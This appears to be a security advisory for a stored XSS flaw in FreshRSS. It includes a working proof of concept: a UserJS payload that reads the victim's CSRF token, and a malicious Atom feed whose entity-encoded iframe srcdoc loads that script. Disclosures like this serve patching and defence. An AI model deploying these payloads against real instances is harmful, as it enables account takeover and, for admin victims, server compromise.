XSS by embedding <script> tag inside <iframe srcdoc>

Summary

HTML is being sanitized improperly inside the <iframe srcdoc> attribute, which leads to XSS by loading an attacker's UserJS inside <script src>

Details

In order to execute the attack, the attacker needs to control one of the victim's feeds and have an account on the FreshRSS instance that the victim is using.

PoC

Sign into the attacker account
Put this payload inside attacker's UserJS:

window.onload = () => {
let main = window.parent;
let modal = document.createElement("div");
modal.innerHTML = `<h1>pwned! csrf token is '${main.context.csrf}'</h1>`;
main.document.body.prepend(modal);
}

Submit the payload and prepare a webserver serving the following evil.xml file:

<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="https://www.w3.org/2005/Atom" xml:lang="en">
    <title>attacker</title>
    <link rel="alternate" type="text/html" href="https://192.168.91.132:1337"/>
    <author><name>XSS</name></author>
    <updated>2024-12-16T00:00:00.000000+00:00</updated>
    <id>attacker</id>
    <entry xml:lang="en">
        <author><name>XSS</name></author>
        <title>XSS</title>
        <published>2024-10-16T00:00:00.000000+00:00</published>
        <link rel="alternate" type="text/html" href="https://192.168.91.132:1337"/>
        <id>XSS</id>
        <content type="html" xml:base="https://192.168.91.132:1337">
            &#60;iframe srcdoc&#61;&#39;&#60;script src&#61;&#47;ext&#46;php&#63;f&#61;attacker&#37;2Fextensions&#37;2FUserJS&#37;2Fscript&#46;js&#38;t&#61;js&#38;242434&#62;&#60;&#47;script&#62;&#39;&#62;&#60;&#47;iframe&#62;
        </content>
    </entry>
</feed>

Here are the entity decoded contents of the HTML content:

<iframe srcdoc='<script src=/ext.php?f=attacker%2Fextensions%2FUserJS%2Fscript.js&t=js&242434></script>'></iframe>

Replace attacker with your attacker username

Now the victim can sign into their account, add https://192.168.91.132:1337/evil.xml into their feeds and the XSS payload will run immediately

Impact

An attacker can gain access to the victim's account by exploiting this vulnerability. If the victim is an admin it would be possible to delete all users (cause damage) or execute arbitrary code on the server by modifying the update URL using fetch() via the XSS.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

XSS by embedding <script> tag inside <iframe srcdoc>

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Credits